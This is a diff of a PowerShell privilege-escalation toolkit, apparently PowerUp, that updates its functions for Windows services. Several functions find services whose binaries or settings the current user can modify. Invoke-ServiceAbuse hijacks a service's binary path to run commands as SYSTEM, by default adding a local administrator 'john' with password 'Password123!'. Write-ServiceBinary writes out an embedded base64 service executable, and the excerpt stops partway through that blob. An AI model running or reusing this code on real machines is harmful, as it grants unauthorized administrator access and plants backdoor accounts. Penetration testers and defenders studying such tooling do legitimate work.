+if the current user has rights to modify the service binary itself or any associated
+arguments. If the associated binary (or any configuration files) can be overwritten,
+privileges may be able to be escalated.
+
+.EXAMPLE
+
+Get-ModifiableServiceFile
 
-    .EXAMPLE
+Get a set of potentially exploitable service binares/config files.
 
-        PS C:\> Get-ModifiableServiceFile
+.OUTPUTS
 
-        Get a set of potentially exploitable service binares/config files.
+PowerUp.ModifiablePath
 #>
-    [CmdletBinding()] param()
+
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.ModifiableServiceFile')]
+    [CmdletBinding()]
+    Param()
 
     Get-WMIObject -Class win32_service | Where-Object {$_ -and $_.pathname} | ForEach-Object {
 
@@ -1508,16 +2126,7 @@ function Get-ModifiableServiceFile {
         $ServiceStartName = $_.startname
 
         $ServicePath | Get-ModifiablePath | ForEach-Object {
-
-            $ServiceRestart = Test-ServiceDaclPermission -PermissionSet 'Restart' -Name $ServiceName
-
-            if($ServiceRestart) {
-                $CanRestart = $True
-            }
-            else {
-                $CanRestart = $False
-            }
-
+            $CanRestart = Test-ServiceDaclPermission -PermissionSet 'Restart' -Name $ServiceName
             $Out = New-Object PSObject
             $Out | Add-Member Noteproperty 'ServiceName' $ServiceName
             $Out | Add-Member Noteproperty 'Path' $ServicePath
@@ -1526,7 +2135,8 @@ function Get-ModifiableServiceFile {
             $Out | Add-Member Noteproperty 'ModifiableFileIdentityReference' $_.IdentityReference
             $Out | Add-Member Noteproperty 'StartName' $ServiceStartName
             $Out | Add-Member Noteproperty 'AbuseFunction' "Install-ServiceBinary -Name '$ServiceName'"
-            $Out | Add-Member Noteproperty 'CanRestart' $CanRestart
+            $Out | Add-Member Noteproperty 'CanRestart' ([Bool]$CanRestart)
+            $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableServiceFile')
             $Out
         }
     }
@@ -1535,42 +2145,45 @@ function Get-ModifiableServiceFile {
 
 function Get-ModifiableService {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Enumerates all services and returns services for which the current user can modify the binPath.
+Enumerates all services and returns services for which the current user can modify the binPath.
 
-    .DESCRIPTION
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail  
 
-        Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if
-        the current user has rights to change the service configuration.
+.DESCRIPTION
 
-    .EXAMPLE
+Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if
+the current user has rights to change the service configuration.
 
-        PS C:\> Get-ModifiableService
+.EXAMPLE
 
-        Get a set of potentially exploitable services.
-#>
-    [CmdletBinding()] param()
+Get-ModifiableService
 
-    Get-Service | Test-ServiceDaclPermission -PermissionSet 'ChangeConfig' | ForEach-Object {
+Get a set of potentially exploitable services.
 
-        $ServiceDetails = $_ | Get-ServiceDetail
+.OUTPUTS
 
-        $ServiceRestart = $_ | Test-ServiceDaclPermission -PermissionSet 'Restart'
+PowerUp.ModifiablePath
+#>
 
-        if($ServiceRestart) {
-            $CanRestart = $True
-        }
-        else {
-            $CanRestart = $False
-        }
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerUp.ModifiableService')]
+    [CmdletBinding()]
+    Param()
 
+    Get-Service | Test-ServiceDaclPermission -PermissionSet 'ChangeConfig' | ForEach-Object {
+        $ServiceDetails = $_ | Get-ServiceDetail
+        $CanRestart = $_ | Test-ServiceDaclPermission -PermissionSet 'Restart'
         $Out = New-Object PSObject
         $Out | Add-Member Noteproperty 'ServiceName' $ServiceDetails.name
         $Out | Add-Member Noteproperty 'Path' $ServiceDetails.pathname
         $Out | Add-Member Noteproperty 'StartName' $ServiceDetails.startname
         $Out | Add-Member Noteproperty 'AbuseFunction' "Invoke-ServiceAbuse -Name '$($ServiceDetails.name)'"
-        $Out | Add-Member Noteproperty 'CanRestart' $CanRestart
+        $Out | Add-Member Noteproperty 'CanRestart' ([Bool]$CanRestart)
+        $Out.PSObject.TypeNames.Insert(0, 'PowerUp.ModifiableService')
         $Out
     }
 }
@@ -1578,37 +2191,47 @@ function Get-ModifiableService {
 
 function Get-ServiceDetail {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns detailed information about a specified service by querying the
+WMI win32_service class for the specified service name.
 
-        Returns detailed information about a specified service by querying the
-        WMI win32_service class for the specified service name.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-    .DESCRIPTION
+.DESCRIPTION
+
+Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on
+the pipeline object returned by Get-Service, extracts out the service name, queries the
+WMI win32_service class for the specified service for details like binPath, and outputs
+everything.
+
+.PARAMETER Name
 
-        Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on
-        the pipeline object returned by Get-Service, extracts out the service name, queries the
-        WMI win32_service class for the specified service for details like binPath, and outputs
-        everything.
+An array of one or more service names to query information for.
 
-    .PARAMETER Name
+.EXAMPLE
 
-        An array of one or more service names to query information for.
+Get-ServiceDetail -Name VulnSVC
 
-    .EXAMPLE
+Gets detailed information about the 'VulnSVC' service.
 
-        PS C:\> Get-ServiceDetail -Name VulnSVC
+.EXAMPLE
 
-        Gets detailed information about the 'VulnSVC' service.
+Get-Service VulnSVC | Get-ServiceDetail
 
-    .EXAMPLE
+Gets detailed information about the 'VulnSVC' service.
 
-        PS C:\> Get-Service VulnSVC | Get-ServiceDetail
+.OUTPUTS
 
-        Gets detailed information about the 'VulnSVC' service.
+System.Management.ManagementObject
 #>
 
-    param (
-        [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
+    [OutputType('PowerUp.ModifiableService')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
         [Alias('ServiceName')]
         [String[]]
         [ValidateNotNullOrEmpty()]
@@ -1616,18 +2239,16 @@ function Get-ServiceDetail {
     )
 
     PROCESS {
-
         ForEach($IndividualService in $Name) {
-
-            $TargetService = Get-Service -Name $IndividualService
-
-            Get-WmiObject -Class win32_service -Filter "Name='$($TargetService.Name)'" | Where-Object {$_} | ForEach-Object {
-                try {
-                    $_
-                }
-                catch{
-                    Write-Verbose "Error: $_"
-                    $null
+            $TargetService = Get-Service -Name $IndividualService -ErrorAction Stop
+            if ($TargetService) {
+                Get-WmiObject -Class win32_service -Filter "Name='$($TargetService.Name)'" | Where-Object {$_} | ForEach-Object {
+                    try {
+                        $_
+                    }
+                    catch {
+                        Write-Verbose "Error: $_"
+                    }
                 }
             }
         }
@@ -1643,107 +2264,121 @@ function Get-ServiceDetail {
 
 function Invoke-ServiceAbuse {
 <#
-    .SYNOPSIS
+.SYNOPSIS
 
-        Abuses a function the current user has configuration rights on in order
-        to add a local administrator or execute a custom command.
+Abuses a function the current user has configuration rights on in order
+to add a local administrator or execute a custom command.
 
-        Author: @harmj0y
-        License: BSD 3-Clause
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Get-ServiceDetail, Set-ServiceBinaryPath  
 
-    .DESCRIPTION
+.DESCRIPTION
 
-        Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current
-        user has configuration modification rights on and executes a series of automated actions to
-        execute commands as SYSTEM. First, the service is enabled if it was set as disabled and the
-        original service binary path and configuration state are preserved. Then the service is stopped
-        and the Set-ServiceBinPath function is used to set the binary (binPath) for the service to a
-        series of commands, the service is started, stopped, and the next command is configured. After
-        completion, the original service configuration is restored and a custom object is returned
-        that captures the service abused and commands run.
+Takes a service Name or a ServiceProcess.ServiceController on the pipeline that the current
+user has configuration modification rights on and executes a series of automated actions to
+execute commands as SYSTEM. First, the service is enabled if it was set as disabled and the
+original service binary path and configuration state are preserved. Then the service is stopped
+and the Set-ServiceBinaryPath function is used to set the binary (binPath) for the service to a
+series of commands, the service is started, stopped, and the next command is configured. After
+completion, the original service configuration is restored and a custom object is returned
+that captures the service abused and commands run.
 
-    .PARAMETER Name
+.PARAMETER Name
 
-        An array of one or more service names to abuse.
+An array of one or more service names to abuse.
 
-    .PARAMETER UserName
+.PARAMETER UserName
 
-        The [domain\]username to add. If not given, it defaults to "john".
-        Domain users are not created, only added to the specified localgroup.
+The [domain\]username to add. If not given, it defaults to "john".
+Domain users are not created, only added to the specified localgroup.
 
-    .PARAMETER Password
+.PARAMETER Password
 
-        The password to set for the added user. If not given, it defaults to "Password123!"
+The password to set for the added user. If not given, it defaults to "Password123!"
 
-    .PARAMETER LocalGroup
+.PARAMETER LocalGroup
 
-        Local group name to add the user to (default of 'Administrators').
+Local group name to add the user to (default of 'Administrators').
 
-    .PARAMETER Credential
+.PARAMETER Credential
 
-        A [Management.Automation.PSCredential] object specifying the user/password to add.
+A [Management.Automation.PSCredential] object specifying the user/password to add.
 
-    .PARAMETER Command
+.PARAMETER Command
 
-        Custom command to execute instead of user creation.
+Custom command to execute instead of user creation.
 
-    .PARAMETER Force
+.PARAMETER Force
 
-        Switch. Force service stopping, even if other services are dependent.
+Switch. Force service stopping, even if other services are dependent.
 
-    .EXAMPLE
+.EXAMPLE
+
+Invoke-ServiceAbuse -Name VulnSVC
 
-        PS C:\> Invoke-ServiceAbuse -Name VulnSVC
+Abuses service 'VulnSVC' to add a localuser "john" with password
+"Password123! to the  machine and local administrator group
 
-        Abuses service 'VulnSVC' to add a localuser "john" with password
-        "Password123! to the  machine and local administrator group
+.EXAMPLE
 
-    .EXAMPLE
+Get-Service VulnSVC | Invoke-ServiceAbuse
 
-        PS C:\> Get-Service VulnSVC | Invoke-ServiceAbuse
+Abuses service 'VulnSVC' to add a localuser "john" with password
+"Password123! to the  machine and local administrator group
+
+.EXAMPLE
 
-        Abuses service 'VulnSVC' to add a localuser "john" with password
-        "Password123! to the  machine and local administrator group
+Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john"
 
-    .EXAMPLE
+Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the
+local adminisrtators group.
 
-        PS C:\> Invoke-ServiceAbuse -Name VulnSVC -UserName "TESTLAB\john"
+.EXAMPLE
 
-        Abuses service 'VulnSVC' to add a the domain user TESTLAB\john to the
-        local adminisrtators group.
+Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users"
 
-    .EXAMPLE
+Abuses service 'VulnSVC' to add a localuser "backdoor" with password
+"password" to the  machine and local "Power Users" group
 
-        PS C:\> Invoke-ServiceAbuse -Name VulnSVC -UserName backdoor -Password password -LocalGroup "Power Users"
+.EXAMPLE
 
-        Abuses service 'VulnSVC' to add a localuser "backdoor" with password
-        "password" to the  machine and local "Power Users" group
+Invoke-ServiceAbuse -Name VulnSVC -Command "net ..."
 
-    .EXAMPLE
+Abuses service 'VulnSVC' to execute a custom command.
 
-        PS C:\> Invoke-ServiceAbuse -Name VulnSVC -Command "net ..."
+.OUTPUTS
 
-        Abuses service 'VulnSVC' to execute a custom command.
+PowerUp.AbusedService
 #>
 
-    param (
-        [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingUserNameAndPassWordParams', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]
+    [OutputType('PowerUp.AbusedService')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
         [Alias('ServiceName')]
         [String[]]
         [ValidateNotNullOrEmpty()]
         $Name,
 
+        [ValidateNotNullOrEmpty()]
         [String]
         $UserName = 'john',
 
+        [ValidateNotNullOrEmpty()]
         [String]
         $Password = 'Password123!',
 
+        [ValidateNotNullOrEmpty()]
         [String]
         $LocalGroup = 'Administrators',
 
         [Management.Automation.PSCredential]
-        $Credential,
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
         [String]
         [ValidateNotNullOrEmpty()]
@@ -1755,12 +2390,12 @@ function Invoke-ServiceAbuse {
 
     BEGIN {
 
-        if($PSBoundParameters['Command']) {
+        if ($PSBoundParameters['Command']) {
             $ServiceCommands = @($Command)
         }
 
         else {
-            if($PSBoundParameters['Credential']) {
+            if ($PSBoundParameters['Credential']) {
                 $UserNameToAdd = $Credential.UserName
                 $PasswordToAdd = $Credential.GetNetworkCredential().Password
             }
@@ -1769,7 +2404,7 @@ function Invoke-ServiceAbuse {
                 $PasswordToAdd = $Password
             }
 
-            if($UserNameToAdd.Contains('\')) {
+            if ($UserNameToAdd.Contains('\')) {
                 # only adding a domain user to the local group, no user creation
                 $ServiceCommands = @("net localgroup $LocalGroup $UserNameToAdd /add")
             }
@@ -1784,8 +2419,7 @@ function Invoke-ServiceAbuse {
 
         ForEach($IndividualService in $Name) {
 
-            $TargetService = Get-Service -Name $IndividualService
-
+            $TargetService = Get-Service -Name $IndividualService -ErrorAction Stop
             $ServiceDetails = $TargetService | Get-ServiceDetail
 
             $RestoreDisabled = $False
@@ -1803,7 +2437,7 @@ function Invoke-ServiceAbuse {
 
             ForEach($ServiceCommand in $ServiceCommands) {
 
-                if($PSBoundParameters['Force']) {
+                if ($PSBoundParameters['Force']) {
                     $TargetService | Stop-Service -Force -ErrorAction Stop
                 }
                 else {
@@ -1811,18 +2445,17 @@ function Invoke-ServiceAbuse {
                 }
 
                 Write-Verbose "Executing command '$ServiceCommand'"
-
-                $Success = $TargetService | Set-ServiceBinPath -binPath "$ServiceCommand"
+                $Success = $TargetService | Set-ServiceBinaryPath -Path "$ServiceCommand"
 
                 if (-not $Success) {
-                    throw "Error reconfiguring the binPath for $($TargetService.Name)"
+                    throw "Error reconfiguring the binary path for $($TargetService.Name)"
                 }
 
                 $TargetService | Start-Service -ErrorAction SilentlyContinue
                 Start-Sleep -Seconds 2
             }
 
-            if($PSBoundParameters['Force']) {
+            if ($PSBoundParameters['Force']) {
                 $TargetService | Stop-Service -Force -ErrorAction Stop
             }
             else {
@@ -1831,24 +2464,24 @@ function Invoke-ServiceAbuse {
 
             Write-Verbose "Restoring original path to service '$($TargetService.Name)'"
             Start-Sleep -Seconds 1
-            $Success = $TargetService | Set-ServiceBinPath -binPath "$OriginalServicePath"
+            $Success = $TargetService | Set-ServiceBinaryPath -Path "$OriginalServicePath"
 
             if (-not $Success) {
                 throw "Error restoring the original binPath for $($TargetService.Name)"
             }
 
             # try to restore the service to whatever the service's original state was
-            if($RestoreDisabled) {
+            if ($RestoreDisabled) {
                 Write-Verbose "Re-disabling service '$($TargetService.Name)'"
                 $TargetService | Set-Service -StartupType Disabled -ErrorAction Stop
             }
-            elseif($OriginalServiceState -eq "Paused") {
+            elseif ($OriginalServiceState -eq "Paused") {
                 Write-Verbose "Starting and then pausing service '$($TargetService.Name)'"
                 $TargetService | Start-Service
                 Start-Sleep -Seconds 1
                 $TargetService | Set-Service -Status Paused -ErrorAction Stop
             }
-            elseif($OriginalServiceState -eq "Stopped") {
+            elseif ($OriginalServiceState -eq "Stopped") {
                 Write-Verbose "Leaving service '$($TargetService.Name)' in stopped state"
             }
             else {
@@ -1859,6 +2492,7 @@ function Invoke-ServiceAbuse {
             $Out = New-Object PSObject
             $Out | Add-Member Noteproperty 'ServiceAbused' $TargetService.Name
             $Out | Add-Member Noteproperty 'Command' $($ServiceCommands -join ' && ')
+            $Out.PSObject.TypeNames.Insert(0, 'PowerUp.AbusedService')
             $Out
         }
     }
@@ -1867,91 +2501,101 @@ function Invoke-ServiceAbuse {
 
 function Write-ServiceBinary {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Patches in the specified command to a pre-compiled C# service executable and
+writes the binary out to the specified ServicePath location.
 
-        Patches in the specified command to a pre-compiled C# service executable and
-        writes the binary out to the specified ServicePath location.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-        Author: @harmj0y
-        License: BSD 3-Clause
+.DESCRIPTION
 
-    .DESCRIPTION
+Takes a pre-compiled C# service binary and patches in the appropriate commands needed
+for service abuse. If a -UserName/-Password or -Credential is specified, the command
+patched in creates a local user and adds them to the specified -LocalGroup, otherwise
+the specified -Command is patched in. The binary is then written out to the specified
+-ServicePath. Either -Name must be specified for the service, or a proper object from
+Get-Service must be passed on the pipeline in order to patch in the appropriate service
+name the binary will be running under.
 
-        Takes a pre-compiled C# service binary and patches in the appropriate commands needed
-        for service abuse. If a -UserName/-Password or -Credential is specified, the command
-        patched in creates a local user and adds them to the specified -LocalGroup, otherwise
-        the specified -Command is patched in. The binary is then written out to the specified
-        -ServicePath. Either -Name must be specified for the service, or a proper object from
-        Get-Service must be passed on the pipeline in order to patch in the appropriate service
-        name the binary will be running under.
+.PARAMETER Name
 
-    .PARAMETER Name
+The service name the EXE will be running under.
 
-        The service name the EXE will be running under.
+.PARAMETER UserName
 
-    .PARAMETER UserName
+The [domain\]username to add. If not given, it defaults to "john".
+Domain users are not created, only added to the specified localgroup.
 
-        The [domain\]username to add. If not given, it defaults to "john".
-        Domain users are not created, only added to the specified localgroup.
+.PARAMETER Password
 
-    .PARAMETER Password
+The password to set for the added user. If not given, it defaults to "Password123!"
 
-        The password to set for the added user. If not given, it defaults to "Password123!"
+.PARAMETER LocalGroup
 
-    .PARAMETER LocalGroup
+Local group name to add the user to (default of 'Administrators').
 
-        Local group name to add the user to (default of 'Administrators').
+.PARAMETER Credential
 
-    .PARAMETER Credential
+A [Management.Automation.PSCredential] object specifying the user/password to add.
 
-        A [Management.Automation.PSCredential] object specifying the user/password to add.
+.PARAMETER Command
 
-    .PARAMETER Command
+Custom command to execute instead of user creation.
 
-        Custom command to execute instead of user creation.
+.PARAMETER Path
 
-    .PARAMETER Path
+Path to write the binary out to, defaults to 'service.exe' in the local directory.
+
+.EXAMPLE
 
-        Path to write the binary out to, defaults to 'service.exe' in the local directory.
+Write-ServiceBinary -Name VulnSVC
 
-    .EXAMPLE
+Writes a service binary to service.exe in the local directory for VulnSVC that
+adds a local Administrator (john/Password123!).
 
-        PS C:\> Write-ServiceBinary -Name VulnSVC
+.EXAMPLE
 
-        Writes a service binary to service.exe in the local directory for VulnSVC that
-        adds a local Administrator (john/Password123!).
+Get-Service VulnSVC | Write-ServiceBinary
 
-    .EXAMPLE
+Writes a service binary to service.exe in the local directory for VulnSVC that
+adds a local Administrator (john/Password123!).
 
-        PS C:\> Get-Service VulnSVC | Write-ServiceBinary
+.EXAMPLE
 
-        Writes a service binary to service.exe in the local directory for VulnSVC that
-        adds a local Administrator (john/Password123!).
+Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
 
-    .EXAMPLE
+Writes a service binary to service.exe in the local directory for VulnSVC that adds
+TESTLAB\john to the Administrators local group.
 
-        PS C:\> Write-ServiceBinary -Name VulnSVC -UserName 'TESTLAB\john'
+.EXAMPLE
 
-        Writes a service binary to service.exe in the local directory for VulnSVC that adds
-        TESTLAB\john to the Administrators local group.
+Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
 
-    .EXAMPLE
+Writes a service binary to service.exe in the local directory for VulnSVC that
+adds a local Administrator (backdoor/Password123!).
 
-        PS C:\> Write-ServiceBinary -Name VulnSVC -UserName backdoor -Password Password123!
+.EXAMPLE
 
-        Writes a service binary to service.exe in the local directory for VulnSVC that
-        adds a local Administrator (backdoor/Password123!).
+Write-ServiceBinary -Name VulnSVC -Command "net ..."
 
-    .EXAMPLE
+Writes a service binary to service.exe in the local directory for VulnSVC that
+executes a custom command.
 
-        PS C:\> Write-ServiceBinary -Name VulnSVC -Command "net ..."
+.OUTPUTS
 
-        Writes a service binary to service.exe in the local directory for VulnSVC that
-        executes a custom command.
+PowerUp.ServiceBinary
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingUserNameAndPassWordParams', '')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPlainTextForPassword', '')]
+    [OutputType('PowerUp.ServiceBinary')]
+    [CmdletBinding()]
     Param(
-        [Parameter(Position=0, Mandatory=$True, ValueFromPipeline=$True, ValueFromPipelineByPropertyName=$True)]
+        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
         [Alias('ServiceName')]
         [String]
         [ValidateNotNullOrEmpty()]
@@ -1967,7 +2611,8 @@ function Write-ServiceBinary {
         $LocalGroup = 'Administrators',
 
         [Management.Automation.PSCredential]
-        $Credential,
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty,
 
         [String]
         [ValidateNotNullOrEmpty()]
@@ -1982,11 +2627,11 @@ function Write-ServiceBinary {
         $B64Binary = "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UmVmbGVjdGlvbgBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlDdWx0dXJlQXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBDb21WaXNpYmxlQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAQXNzZW1ibHlWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAU3lzdGVtLkRpYWdub3N0aWNzAERlYnVnZ2FibGVBdHRyaWJ1dGUARGVidWdnaW5nTW9kZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAElEaXNwb3NhYmxlAENvbnRhaW5lcgBTdHJpbmcAVHJpbQBzZXRfU2VydmljZU5hbWUAUHJvY2VzcwBTdGFydABTeXN0ZW0uVGhyZWFkaW5nAFRocmVhZABTbGVlcABFbnZpcm9ubWVudABFeGl0AFJ1bgAARUEAQQBBACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAAL/3LwBDACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAA